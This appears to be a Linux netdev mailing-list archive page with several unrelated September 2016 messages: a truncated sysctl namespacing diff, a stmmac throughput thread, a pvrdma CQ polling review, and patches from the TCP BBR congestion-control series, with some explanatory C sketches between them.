--- a/net/ax25/sysctl_net_ax25.c
+++ b/net/ax25/sysctl_net_ax25.c
@@ -158,8 +158,10 @@ int ax25_register_dev_sysctl(ax25_dev *ax25_dev)
if (!table)
return -ENOMEM;
 
-   for (k = 0; k < AX25_MAX_VALUES; k++)
+   for (k = 0; k < AX25_MAX_VALUES; k++) {
table[k].data = &ax25_dev->values[k];
+   table[k].namespaced = true;
+   }
 
snprintf(path, sizeof(path), "net/ax25/%s", ax25_dev->dev->name);
ax25_dev->sysheader = register_net_sysctl(&init_net, path, table);
diff --git a/net/ieee802154/6lowpan/reassembly.c b/net/ieee802154/6lowpan/reassembly.c
index 30d875d..8a1d5b7 100644
--- a/net/ieee802154/6lowpan/reassembly.c
+++ b/net/ieee802154/6lowpan/reassembly.c
@@ -456,7 +456,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.maxlen = sizeof(int),
.mode   = 0644,
.proc_handler   = proc_dointvec_minmax,
-   .extra1 = &init_net.ieee802154_lowpan.frags.low_thresh
+   .extra1 = &init_net.ieee802154_lowpan.frags.low_thresh,
+   .namespaced = true,
},
{
.procname   = "6lowpanfrag_low_thresh",
@@ -465,7 +466,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.mode   = 0644,
.proc_handler   = proc_dointvec_minmax,
.extra1 = &zero,
-   .extra2 = &init_net.ieee802154_lowpan.frags.high_thresh
+   .extra2 = &init_net.ieee802154_lowpan.frags.high_thresh,
+   .namespaced = true,
},
{
.procname   = "6lowpanfrag_time",
@@ -473,6 +475,7 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
.maxlen = sizeof(int),
.mode

Re: stmmac/RTL8211F/Meson GXBB: TX throughput problems

2016-09-18 Thread André Roth


Hello,

> For example, you could try disabling scatter-gather or tx checksumming
> via ethtool and see whether there is some benefit; then we could imagine
> some problem on your HW or SYNP MAC integration for checksumming
> on the tx side.

Disabling either of the following:
  ethtool -K eth0 sg off
or:
  ethtool -K eth0 tx off
does not prevent the network communication from going down.

> Also you could check the AXI tuning and PBL value. To be honest
> (thinking about your problem) I actually suspect some related
> problem in the bus setup. So I suggest you play with these values
> (better if you ask for values from HW validation on your side).
> Otherwise the stmmac uses a default that may not be good for your
> platform. For example, I have sometimes seen that PBL is better if
> reduced to 8 instead of 32 and w/o 4xPBL...

How can I set those values?

thanks for your time,

 andre

RE: [PATCH v4 09/16] IB/pvrdma: Add support for Completion Queues

2016-09-18 Thread Adit Ranadive

On Sun, Sep 18, 2016 at 10:07:18 -0700, Leon Romanovsky wrote: 
> On Thu, Sep 15, 2016 at 10:36:12AM +0300, Yuval Shaia wrote:
> > Hi Adit,
> > Please see my comments inline.
> >
> > Besides that I have no more comment for this patch.
> >
> > Reviewed-by: Yuval Shaia 
> >
> > Yuval
> >
> > On Thu, Sep 15, 2016 at 12:07:29AM +0000, Adit Ranadive wrote:
> > > On Wed, Sep 14, 2016 at 05:43:37 -0700, Yuval Shaia wrote:
> > > > On Sun, Sep 11, 2016 at 09:49:19PM -0700, Adit Ranadive wrote:
> > > > > +
> > > > > +static int pvrdma_poll_one(struct pvrdma_cq *cq, struct pvrdma_qp **cur_qp,
> > > > > +struct ib_wc *wc)
> > > > > +{
> > > > > + struct pvrdma_dev *dev = to_vdev(cq->ibcq.device);
> > > > > + int has_data;
> > > > > + unsigned int head;
> > > > > + bool tried = false;
> > > > > + struct pvrdma_cqe *cqe;
> > > > > +
> > > > > +retry:
> > > > > + has_data = pvrdma_idx_ring_has_data(&cq->ring_state->rx,
> > > > > + cq->ibcq.cqe, &head);
> > > > > + if (has_data == 0) {
> > > > > + if (tried)
> > > > > + return -EAGAIN;
> > > > > +
> > > > > + /* Pass down POLL to give physical HCA a chance to poll. */
> > > > > + pvrdma_write_uar_cq(dev, cq->cq_handle | PVRDMA_UAR_CQ_POLL);
> > > > > +
> > > > > + tried = true;
> > > > > + goto retry;
> > > > > + } else if (has_data == PVRDMA_INVALID_IDX) {
> > > >
> > > > I didn't go through the entire life cycle of the RX ring's head and tail,
> > > > but you need to make sure that the PVRDMA_INVALID_IDX error is a
> > > > recoverable one, i.e. that there is a chance the next call to
> > > > pvrdma_poll_one will be fine.
> > > > Otherwise it is an endless loop.
> > >
> > > We have never run into this issue internally but I don't think we can
> > > recover here
> >
> > I briefly reviewed the life cycle of the RX ring's head and tail and didn't
> > catch any suspicious place that might corrupt it.
> > So glad to see that you never encountered this case.
> >
> > > in the driver. The only way to recover would be to destroy and recreate
> > > the CQ, which we shouldn't do since it could be used by multiple QPs.
> >
> > Agree.
> > But don't they hit the same problem too?
> >
> > > We don't have a way yet to recover in the device. Once we add that, this
> > > check should go away.
> >
> > To be honest I have no idea how to do that - I was expecting driver
> > vendors to come up with ideas :)
> > I once came up with an idea to force a restart of the driver but it was
> > rejected.
> >
> > >
> > > The reason I returned an error value from poll_cq in v3 was to break the
> > > possible loop so that it might give clients a chance to recover. But since
> > > poll_cq is not expected to fail I just log the device error here. I can
> > > revert to that version if you want to break the possible loop.
> >
> > Clients (ULPs) cannot recover from this case. They do not even check the
> > reason for the error and treat any error as -EAGAIN.
> 
> It is because poll_one is not expected to fail.

Poll_one is an internal function in our driver. ULPs should still be okay, I
think, as long as poll_cq
does not fail, no?
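
For readers following the thread, the retry-once shape of the quoted pvrdma_poll_one() can be sketched in user space as below. This is only an illustration under assumptions: demo_ring, demo_kick() and demo_poll_one() are hypothetical stand-ins, not the pvrdma structures or helpers, and the PVRDMA_INVALID_IDX case discussed above is deliberately left out.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Hypothetical stand-in for the completion ring; not the pvrdma layout. */
struct demo_ring {
	int pending;        /* completions currently visible to the driver */
	int arrive_on_kick; /* completions that show up after a doorbell write */
	int kicks;          /* number of doorbell writes issued */
};

/* Hypothetical doorbell: asks the device to poll the physical HCA. */
static void demo_kick(struct demo_ring *r)
{
	r->kicks++;
	r->pending += r->arrive_on_kick;
	r->arrive_on_kick = 0;
}

/* Returns 0 if one completion was consumed, or -EAGAIN if the ring was
 * still empty after a single doorbell write.
 */
static int demo_poll_one(struct demo_ring *r)
{
	bool tried = false;

	assert(r);
	for (;;) {
		if (r->pending > 0) {
			r->pending--;
			return 0;
		}
		if (tried)
			return -EAGAIN;
		demo_kick(r);	/* give the device one chance to produce data */
		tried = true;
	}
}
```

The point of the tried flag is that an empty ring costs at most one doorbell write per call, so the loop cannot spin on the empty case.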

[PATCH v3 net-next 00/16] tcp: BBR congestion control algorithm

2016-09-18 Thread Neal Cardwell

tcp: BBR congestion control algorithm

This patch series implements a new TCP congestion control algorithm:
BBR (Bottleneck Bandwidth and RTT). A paper with a detailed
description of BBR will be published in ACM Queue, September-October
2016, as "BBR: Congestion-Based Congestion Control". BBR is widely
deployed in production at Google.

The patch series starts with a set of supporting infrastructure
changes, including a few that extend the congestion control
framework. The last patch adds BBR as a TCP congestion control
module. Please see individual patches for the details.

- v2 -> v3: fix another issue caught by build bots:
 - adjust rate_sample struct initialization syntax to allow gcc-4.4 to compile
   the "tcp: track data delivery rate for a TCP connection" patch; also
   adjusted some similar syntax in "tcp_bbr: add BBR congestion control"

- v1 -> v2: fix issues caught by build bots:
 - fix "tcp: export data delivery rate" to use rate64 instead of rate,
   so there is a 64-bit numerator for the do_div call
 - fix conflicting definitions for minmax caused by
   "tcp: use windowed min filter library for TCP min_rtt estimation"
   with a new commit:
   tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
 - fix warning about the use of __packed in
   "tcp: track data delivery rate for a TCP connection",
   which involves the addition of a new commit:
   tcp: switch back to proper tcp_skb_cb size check in tcp_init()  

Eric Dumazet (2):
  net_sched: sch_fq: add low_rate_threshold parameter
  tcp: switch back to proper tcp_skb_cb size check in tcp_init()

Neal Cardwell (8):
  lib/win_minmax: windowed min or max estimator
  tcp: use windowed min filter library for TCP min_rtt estimation
  tcp: count packets marked lost for a TCP connection
  tcp: allow congestion control module to request TSO skb segment count
  tcp: export tcp_tso_autosize() and parameterize minimum number of TSO
segments
  tcp: export tcp_mss_to_mtu() for congestion control modules
  tcp: increase ICSK_CA_PRIV_SIZE from 64 bytes to 88
  tcp_bbr: add BBR congestion control

Soheil Hassas Yeganeh (2):
  tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
  tcp: track application-limited rate samples

Yuchung Cheng (4):
  tcp: track data delivery rate for a TCP connection
  tcp: export data delivery rate
  tcp: allow congestion control to expand send buffer differently
  tcp: new CC hook to set sending rate with rate_sample in any CA state

 include/linux/tcp.h|  14 +-
 include/linux/win_minmax.h |  37 ++
 include/net/inet_connection_sock.h |   4 +-
 include/net/tcp.h  |  53 ++-
 include/uapi/linux/inet_diag.h |  13 +
 include/uapi/linux/pkt_sched.h |   2 +
 include/uapi/linux/tcp.h   |   3 +
 lib/Makefile   |   2 +-
 lib/win_minmax.c   |  98 +
 net/ipv4/Kconfig   |  18 +
 net/ipv4/Makefile  |   3 +-
 net/ipv4/tcp.c |  26 +-
 net/ipv4/tcp_bbr.c | 875 +
 net/ipv4/tcp_cdg.c |  12 +-
 net/ipv4/tcp_cong.c|   2 +-
 net/ipv4/tcp_input.c   | 154 +++
 net/ipv4/tcp_minisocks.c   |   5 +-
 net/ipv4/tcp_output.c  |  27 +-
 net/ipv4/tcp_rate.c| 186 
 net/sched/sch_fq.c |  22 +-
 20 files changed, 1449 insertions(+), 107 deletions(-)
 create mode 100644 include/linux/win_minmax.h
 create mode 100644 lib/win_minmax.c
 create mode 100644 net/ipv4/tcp_bbr.c
 create mode 100644 net/ipv4/tcp_rate.c

-- 
2.8.0.rc3.226.g39d4020

[PATCH v3 net-next 01/16] tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict

2016-09-18 Thread Neal Cardwell

From: Soheil Hassas Yeganeh 

The upcoming change "lib/win_minmax: windowed min or max estimator"
introduces a struct called minmax, which is then included in
include/linux/tcp.h in the upcoming change "tcp: use windowed min
filter library for TCP min_rtt estimation". This would create a
compilation error for tcp_cdg.c, which defines its own minmax
struct. To avoid this naming conflict (and potentially others in the
future), this commit renames the version used in tcp_cdg.c to
cdg_minmax.

Signed-off-by: Soheil Hassas Yeganeh 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Eric Dumazet 
Cc: Kenneth Klette Jonassen 
---
 net/ipv4/tcp_cdg.c | 12 ++--
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/net/ipv4/tcp_cdg.c b/net/ipv4/tcp_cdg.c
index 03725b2..35b2803 100644
--- a/net/ipv4/tcp_cdg.c
+++ b/net/ipv4/tcp_cdg.c
@@ -56,7 +56,7 @@ MODULE_PARM_DESC(use_shadow, "use shadow window heuristic");
 module_param(use_tolerance, bool, 0644);
 MODULE_PARM_DESC(use_tolerance, "use loss tolerance heuristic");
 
-struct minmax {
+struct cdg_minmax {
union {
struct {
s32 min;
@@ -74,10 +74,10 @@ enum cdg_state {
 };
 
 struct cdg {
-   struct minmax rtt;
-   struct minmax rtt_prev;
-   struct minmax *gradients;
-   struct minmax gsum;
+   struct cdg_minmax rtt;
+   struct cdg_minmax rtt_prev;
+   struct cdg_minmax *gradients;
+   struct cdg_minmax gsum;
bool gfilled;
u8  tail;
u8  state;
@@ -353,7 +353,7 @@ static void tcp_cdg_cwnd_event(struct sock *sk, const enum tcp_ca_event ev)
 {
struct cdg *ca = inet_csk_ca(sk);
struct tcp_sock *tp = tcp_sk(sk);
-   struct minmax *gradients;
+   struct cdg_minmax *gradients;
 
switch (ev) {
case CA_EVENT_CWND_RESTART:
-- 
2.8.0.rc3.226.g39d4020

[PATCH v3 net-next 06/16] tcp: count packets marked lost for a TCP connection

2016-09-18 Thread Neal Cardwell

Count the number of packets that a TCP connection marks lost.

Congestion control modules can use this loss rate information for more
intelligent decisions about how fast to send.

Specifically, this is used in TCP BBR policer detection. BBR uses a
high packet loss rate as one signal in its policer detection and
policer bandwidth estimation algorithm.

The BBR policer detection algorithm cannot simply track retransmits,
because a retransmit can be (and often is) an indicator of packets
lost long, long ago. This is particularly true in a long CA_Loss
period that repairs the initial massive losses when a policer kicks
in.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/linux/tcp.h  |  1 +
 net/ipv4/tcp_input.c | 25 -
 2 files changed, 25 insertions(+), 1 deletion(-)

diff --git a/include/linux/tcp.h b/include/linux/tcp.h
index 6433cc8..38590fb 100644
--- a/include/linux/tcp.h
+++ b/include/linux/tcp.h
@@ -267,6 +267,7 @@ struct tcp_sock {
 * receiver in Recovery. */
u32 prr_out;/* Total number of pkts sent during Recovery. */
u32 delivered;  /* Total data packets delivered incl. rexmits */
+   u32 lost;   /* Total data packets lost incl. rexmits */
 
u32 rcv_wnd;/* Current receiver window  */
u32 write_seq;  /* Tail(+1) of data held in tcp send buffer */
diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index ac5b38f..024b579 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -899,12 +899,29 @@ static void tcp_verify_retransmit_hint(struct tcp_sock *tp, struct sk_buff *skb)
tp->retransmit_high = TCP_SKB_CB(skb)->end_seq;
 }
 
+/* Sum the number of packets on the wire we have marked as lost.
+ * There are two cases we care about here:
+ * a) Packet hasn't been marked lost (nor retransmitted),
+ *and this is the first loss.
+ * b) Packet has been marked both lost and retransmitted,
+ *and this means we think it was lost again.
+ */
+static void tcp_sum_lost(struct tcp_sock *tp, struct sk_buff *skb)
+{
+   __u8 sacked = TCP_SKB_CB(skb)->sacked;
+
+   if (!(sacked & TCPCB_LOST) ||
+   ((sacked & TCPCB_LOST) && (sacked & TCPCB_SACKED_RETRANS)))
+   tp->lost += tcp_skb_pcount(skb);
+}
+
 static void tcp_skb_mark_lost(struct tcp_sock *tp, struct sk_buff *skb)
 {
if (!(TCP_SKB_CB(skb)->sacked & (TCPCB_LOST|TCPCB_SACKED_ACKED))) {
tcp_verify_retransmit_hint(tp, skb);
 
tp->lost_out += tcp_skb_pcount(skb);
+   tcp_sum_lost(tp, skb);
TCP_SKB_CB(skb)->sacked |= TCPCB_LOST;
}
 }
@@ -913,6 +930,7 @@ void tcp_skb_mark_lost_uncond_verify(struct tcp_sock *tp, struct sk_buff *skb)
 {
tcp_verify_retransmit_hint(tp, skb);
 
+   tcp_sum_lost(tp, skb);
if (!(TCP_SKB_CB(skb)->sacked & (TCPCB_LOST|TCPCB_SACKED_ACKED))) {
tp->lost_out += tcp_skb_pcount(skb);
TCP_SKB_CB(skb)->sacked |= TCPCB_LOST;
@@ -1890,6 +1908,7 @@ void tcp_enter_loss(struct sock *sk)
struct sk_buff *skb;
bool new_recovery = icsk->icsk_ca_state < TCP_CA_Recovery;
bool is_reneg;  /* is receiver reneging on SACKs? */
+   bool mark_lost;
 
/* Reduce ssthresh if it has not yet been made inside this window. */
if (icsk->icsk_ca_state <= TCP_CA_Disorder ||
@@ -1923,8 +1942,12 @@ void tcp_enter_loss(struct sock *sk)
if (skb == tcp_send_head(sk))
break;
 
+   mark_lost = (!(TCP_SKB_CB(skb)->sacked & TCPCB_SACKED_ACKED) ||
+is_reneg);
+   if (mark_lost)
+   tcp_sum_lost(tp, skb);
TCP_SKB_CB(skb)->sacked &= (~TCPCB_TAGBITS)|TCPCB_SACKED_ACKED;
-   if (!(TCP_SKB_CB(skb)->sacked&TCPCB_SACKED_ACKED) || is_reneg) {
+   if (mark_lost) {
TCP_SKB_CB(skb)->sacked &= ~TCPCB_SACKED_ACKED;
TCP_SKB_CB(skb)->sacked |= TCPCB_LOST;
tp->lost_out += tcp_skb_pcount(skb);
-- 
2.8.0.rc3.226.g39d4020
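
As a reading aid for the two cases in the tcp_sum_lost() comment, here is a small user-space sketch. It is not the kernel code: the demo_ types are hypothetical and the flag values are assumed for illustration, since the patch only shows the flag names. The condition is written in its reduced form, since "not lost, or lost and retransmitted" is the same as "not lost, or retransmitted".

```c
#include <assert.h>
#include <stdint.h>

/* Flag values assumed for illustration; the patch only shows the names. */
#define DEMO_SACKED_ACKED   0x01
#define DEMO_SACKED_RETRANS 0x02
#define DEMO_LOST           0x04

struct demo_skb {
	uint8_t  sacked;  /* per-packet state flags */
	uint32_t pcount;  /* number of packets this skb represents */
};

struct demo_tp {
	uint32_t lost;    /* running total of packets marked lost */
};

/* Count (a) a first loss, or (b) a repeated loss of a packet that was
 * already marked lost and then retransmitted. A packet that is marked
 * lost but not yet retransmitted is not counted a second time.
 */
static void demo_sum_lost(struct demo_tp *tp, const struct demo_skb *skb)
{
	assert(tp && skb);
	if (!(skb->sacked & DEMO_LOST) ||
	    (skb->sacked & DEMO_SACKED_RETRANS))
		tp->lost += skb->pcount;
}
```

Calling demo_sum_lost() on a fresh skb, then on one that is only marked lost, then on one that is lost and retransmitted, counts the first and third but not the second.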

[PATCH v3 net-next 04/16] net_sched: sch_fq: add low_rate_threshold parameter

2016-09-18 Thread Neal Cardwell

From: Eric Dumazet 

This commit adds to the fq module a low_rate_threshold parameter to
insert a delay after all packets if the socket requests a pacing rate
below the threshold.

This helps achieve more precise control of the sending rate with
low-rate paths, especially policers. The basic issue is that if a
congestion control module detects a policer at a certain rate, it may
want fq to be able to shape to that policed rate. That way the sender
can avoid policer drops by having the packets arrive at the policer at
or just under the policed rate.

The default threshold of 550Kbps was chosen analytically so that for
policers or links at 500Kbps or 512Kbps fq would very likely invoke
this mechanism, even if the pacing rate was briefly slightly above the
available bandwidth. This value was then empirically validated with
two years of production testing on YouTube video servers.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/uapi/linux/pkt_sched.h |  2 ++
 net/sched/sch_fq.c | 22 +++---
 2 files changed, 21 insertions(+), 3 deletions(-)

diff --git a/include/uapi/linux/pkt_sched.h b/include/uapi/linux/pkt_sched.h
index 2382eed..f8e39db 100644
--- a/include/uapi/linux/pkt_sched.h
+++ b/include/uapi/linux/pkt_sched.h
@@ -792,6 +792,8 @@ enum {
 
TCA_FQ_ORPHAN_MASK, /* mask applied to orphaned skb hashes */
 
+   TCA_FQ_LOW_RATE_THRESHOLD, /* per packet delay under this rate */
+
__TCA_FQ_MAX
 };
 
diff --git a/net/sched/sch_fq.c b/net/sched/sch_fq.c
index e5458b9..40ad4fc 100644
--- a/net/sched/sch_fq.c
+++ b/net/sched/sch_fq.c
@@ -94,6 +94,7 @@ struct fq_sched_data {
u32 flow_max_rate;  /* optional max rate per flow */
u32 flow_plimit;/* max packets per flow */
u32 orphan_mask;/* mask for orphaned skb */
+   u32 low_rate_threshold;
struct rb_root  *fq_root;
u8  rate_enable;
u8  fq_trees_log;
@@ -433,7 +434,7 @@ static struct sk_buff *fq_dequeue(struct Qdisc *sch)
struct fq_flow_head *head;
struct sk_buff *skb;
struct fq_flow *f;
-   u32 rate;
+   u32 rate, plen;
 
skb = fq_dequeue_head(sch, &q->internal);
if (skb)
@@ -482,7 +483,7 @@ begin:
prefetch(&skb->end);
f->credit -= qdisc_pkt_len(skb);
 
-   if (f->credit > 0 || !q->rate_enable)
+   if (!q->rate_enable)
goto out;
 
/* Do not pace locally generated ack packets */
@@ -493,8 +494,15 @@ begin:
if (skb->sk)
rate = min(skb->sk->sk_pacing_rate, rate);
 
+   if (rate <= q->low_rate_threshold) {
+   f->credit = 0;
+   plen = qdisc_pkt_len(skb);
+   } else {
+   plen = max(qdisc_pkt_len(skb), q->quantum);
+   if (f->credit > 0)
+   goto out;
+   }
if (rate != ~0U) {
-   u32 plen = max(qdisc_pkt_len(skb), q->quantum);
u64 len = (u64)plen * NSEC_PER_SEC;
 
if (likely(rate))
@@ -662,6 +670,7 @@ static const struct nla_policy fq_policy[TCA_FQ_MAX + 1] = {
[TCA_FQ_FLOW_MAX_RATE]  = { .type = NLA_U32 },
[TCA_FQ_BUCKETS_LOG]= { .type = NLA_U32 },
[TCA_FQ_FLOW_REFILL_DELAY]  = { .type = NLA_U32 },
+   [TCA_FQ_LOW_RATE_THRESHOLD] = { .type = NLA_U32 },
 };
 
 static int fq_change(struct Qdisc *sch, struct nlattr *opt)
@@ -716,6 +725,10 @@ static int fq_change(struct Qdisc *sch, struct nlattr *opt)
if (tb[TCA_FQ_FLOW_MAX_RATE])
q->flow_max_rate = nla_get_u32(tb[TCA_FQ_FLOW_MAX_RATE]);
 
+   if (tb[TCA_FQ_LOW_RATE_THRESHOLD])
+   q->low_rate_threshold =
+   nla_get_u32(tb[TCA_FQ_LOW_RATE_THRESHOLD]);
+
if (tb[TCA_FQ_RATE_ENABLE]) {
u32 enable = nla_get_u32(tb[TCA_FQ_RATE_ENABLE]);
 
@@ -781,6 +794,7 @@ static int fq_init(struct Qdisc *sch, struct nlattr *opt)
q->fq_root  = NULL;
q->fq_trees_log = ilog2(1024);
q->orphan_mask  = 1024 - 1;
+   q->low_rate_threshold   = 550000 / 8;
qdisc_watchdog_init(&q->watchdog, sch);
 
if (opt)
@@ -811,6 +825,8 @@ static int fq_dump(struct Qdisc *sch, struct sk_buff *skb)
nla_put_u32(skb, TCA_FQ_FLOW_REFILL_DELAY,
jiffies_to_usecs(q->flow_refill_delay)) ||
nla_put_u32(skb, TCA_FQ_ORPHAN_MASK, q->orphan_mask) ||
+   nla_put_u32(skb, TCA_FQ_LOW_RATE_THRESHOLD,
+   q->low_rate_threshold) ||
nla_put_u32(skb, TCA_FQ_BUCKETS_LOG, q->fq_trees_log))
goto nla_put_failure;
 
-- 
2.8.0.rc3.226.g39d4020
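
To make the threshold arithmetic concrete, here is a user-space sketch of the delay computation that the fq_dequeue() hunk implies. It is an approximation under assumptions: the demo_ names are hypothetical, rates are taken to be in bytes per second (so 550Kbps becomes 550000 / 8), and a rate of 0 is treated as unpaced here purely to avoid a division by zero, which is not how the patch handles it.

```c
#include <assert.h>
#include <stdint.h>

#define DEMO_NSEC_PER_SEC 1000000000ULL

struct demo_fq {
	uint32_t quantum;            /* bytes */
	uint32_t low_rate_threshold; /* bytes per second */
};

/* Returns the delay in nanoseconds to insert after this packet, or 0 if
 * the packet may be followed immediately.
 */
static uint64_t demo_pacing_delay_ns(const struct demo_fq *q, int32_t *credit,
				     uint32_t pkt_len, uint32_t rate)
{
	uint32_t plen;

	assert(q && credit);
	if (rate <= q->low_rate_threshold) {
		/* Low rate: drop any credit and delay after every packet. */
		*credit = 0;
		plen = pkt_len;
	} else {
		/* Normal rate: pace in quantum-sized units, and only once
		 * the flow has used up its credit.
		 */
		plen = pkt_len > q->quantum ? pkt_len : q->quantum;
		if (*credit > 0)
			return 0;
	}
	if (rate == UINT32_MAX || rate == 0)	/* unpaced in this sketch */
		return 0;
	return (uint64_t)plen * DEMO_NSEC_PER_SEC / rate;
}
```

With the default threshold, a 1500-byte packet on a flow paced at 500Kbps (62500 bytes per second) gets a 24 ms gap even if the flow still had credit, which is the per-packet shaping the commit message describes.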

[PATCH v3 net-next 03/16] tcp: use windowed min filter library for TCP min_rtt estimation

2016-09-18 Thread Neal Cardwell

Refactor the TCP min_rtt code to reuse the new win_minmax library in
lib/win_minmax.c to simplify the TCP code.

This is a pure refactor: the functionality is exactly the same. We
just moved the windowed min code to make TCP easier to read and
maintain, and to allow other parts of the kernel to use the windowed
min/max filter code.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/linux/tcp.h  |  5 ++--
 include/net/tcp.h|  2 +-
 net/ipv4/tcp.c   |  2 +-
 net/ipv4/tcp_input.c | 64 
 net/ipv4/tcp_minisocks.c |  2 +-
 5 files changed, 10 insertions(+), 65 deletions(-)

diff --git a/include/linux/tcp.h b/include/linux/tcp.h
index c723a46..6433cc8 100644
--- a/include/linux/tcp.h
+++ b/include/linux/tcp.h
@@ -19,6 +19,7 @@
 
 
 #include 
+#include <linux/win_minmax.h>
 #include 
 #include 
 #include 
@@ -234,9 +235,7 @@ struct tcp_sock {
u32 mdev_max_us;/* maximal mdev for the last rtt period */
u32 rttvar_us;  /* smoothed mdev_max*/
u32 rtt_seq;/* sequence number to update rttvar */
-   struct rtt_meas {
-   u32 rtt, ts;/* RTT in usec and sampling time in jiffies. */
-   } rtt_min[3];
+   struct  minmax rtt_min;
 
u32 packets_out;/* Packets which are "in flight"*/
u32 retrans_out;/* Retransmitted packets out*/
diff --git a/include/net/tcp.h b/include/net/tcp.h
index fdfbedd..2f1648a 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -671,7 +671,7 @@ static inline bool tcp_ca_dst_locked(const struct dst_entry *dst)
 /* Minimum RTT in usec. ~0 means not available. */
 static inline u32 tcp_min_rtt(const struct tcp_sock *tp)
 {
-   return tp->rtt_min[0].rtt;
+   return minmax_get(&tp->rtt_min);
 }
 
 /* Compute the actual receive window we are currently advertising.
diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
index a13fcb3..5b0b49c 100644
--- a/net/ipv4/tcp.c
+++ b/net/ipv4/tcp.c
@@ -387,7 +387,7 @@ void tcp_init_sock(struct sock *sk)
 
icsk->icsk_rto = TCP_TIMEOUT_INIT;
tp->mdev_us = jiffies_to_usecs(TCP_TIMEOUT_INIT);
-   tp->rtt_min[0].rtt = ~0U;
+   minmax_reset(&tp->rtt_min, tcp_time_stamp, ~0U);
 
/* So many TCP implementations out there (incorrectly) count the
 * initial SYN frame in their delayed-ACK and congestion control
diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index 70b892d..ac5b38f 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -2879,67 +2879,13 @@ static void tcp_fastretrans_alert(struct sock *sk, const int acked,
*rexmit = REXMIT_LOST;
 }
 
-/* Kathleen Nichols' algorithm for tracking the minimum value of
- * a data stream over some fixed time interval. (E.g., the minimum
- * RTT over the past five minutes.) It uses constant space and constant
- * time per update yet almost always delivers the same minimum as an
- * implementation that has to keep all the data in the window.
- *
- * The algorithm keeps track of the best, 2nd best & 3rd best min
- * values, maintaining an invariant that the measurement time of the
- * n'th best >= n-1'th best. It also makes sure that the three values
- * are widely separated in the time window since that bounds the worse
- * case error when that data is monotonically increasing over the window.
- *
- * Upon getting a new min, we can forget everything earlier because it
- * has no value - the new min is <= everything else in the window by
- * definition and it's the most recent. So we restart fresh on every new min
- * and overwrites 2nd & 3rd choices. The same property holds for 2nd & 3rd
- * best.
- */
 static void tcp_update_rtt_min(struct sock *sk, u32 rtt_us)
 {
-   const u32 now = tcp_time_stamp, wlen = sysctl_tcp_min_rtt_wlen * HZ;
-   struct rtt_meas *m = tcp_sk(sk)->rtt_min;
-   struct rtt_meas rttm = {
-   .rtt = likely(rtt_us) ? rtt_us : jiffies_to_usecs(1),
-   .ts = now,
-   };
-   u32 elapsed;
-
-   /* Check if the new measurement updates the 1st, 2nd, or 3rd choices */
-   if (unlikely(rttm.rtt <= m[0].rtt))
-   m[0] = m[1] = m[2] = rttm;
-   else if (rttm.rtt <= m[1].rtt)
-   m[1] = m[2] = rttm;
-   else if (rttm.rtt <= m[2].rtt)
-   m[2] = rttm;
-
-   elapsed = now - m[0].ts;
-   if (unlikely(elapsed > wlen)) {
-   /* Passed entire window without a new min so make 2nd choice
-* the new min & 3rd choice the new 2nd. So forth and so on.
-*/
-   m[0] = m[1];
-   m[1] = m[2];
-   m[2] = rttm;
-   if (now - m[0].ts > wlen) {
-   m[0] = m[1];
-   m[1] = rttm;
-

[PATCH v3 net-next 02/16] lib/win_minmax: windowed min or max estimator

2016-09-18 Thread Neal Cardwell

This commit introduces a generic library to estimate either the min or
max value of a time-varying variable over a recent time window. This
is code originally from Kathleen Nichols. The current form of the code
is from Van Jacobson.

A single struct minmax will track the estimated windowed-max
value of the series if you call minmax_running_max() or the estimated
windowed-min value of the series if you call minmax_running_min().

Nearly equivalent code is already in place for minimum RTT estimation
in the TCP stack. This commit extracts that code and generalizes it to
handle both min and max. Moving the code here reduces the footprint
and complexity of the TCP code base and makes the filter generally
available for other parts of the codebase, including an upcoming TCP
congestion control module.

This library works well for time series where the measurements are
smoothly increasing or decreasing.

Signed-off-by: Van Jacobson 
Signed-off-by: Neal Cardwell 
Signed-off-by: Yuchung Cheng 
Signed-off-by: Nandita Dukkipati 
Signed-off-by: Eric Dumazet 
Signed-off-by: Soheil Hassas Yeganeh 
---
 include/linux/win_minmax.h | 37 +
 lib/Makefile   |  2 +-
 lib/win_minmax.c   | 98 ++
 3 files changed, 136 insertions(+), 1 deletion(-)
 create mode 100644 include/linux/win_minmax.h
 create mode 100644 lib/win_minmax.c

diff --git a/include/linux/win_minmax.h b/include/linux/win_minmax.h
new file mode 100644
index 0000000..5656960
--- /dev/null
+++ b/include/linux/win_minmax.h
@@ -0,0 +1,37 @@
+/**
+ * lib/minmax.c: windowed min/max tracker by Kathleen Nichols.
+ *
+ */
+#ifndef MINMAX_H
+#define MINMAX_H
+
+#include 
+
+/* A single data point for our parameterized min-max tracker */
+struct minmax_sample {
+   u32 t;  /* time measurement was taken */
+   u32 v;  /* value measured */
+};
+
+/* State for the parameterized min-max tracker */
+struct minmax {
+   struct minmax_sample s[3];
+};
+
+static inline u32 minmax_get(const struct minmax *m)
+{
+   return m->s[0].v;
+}
+
+static inline u32 minmax_reset(struct minmax *m, u32 t, u32 meas)
+{
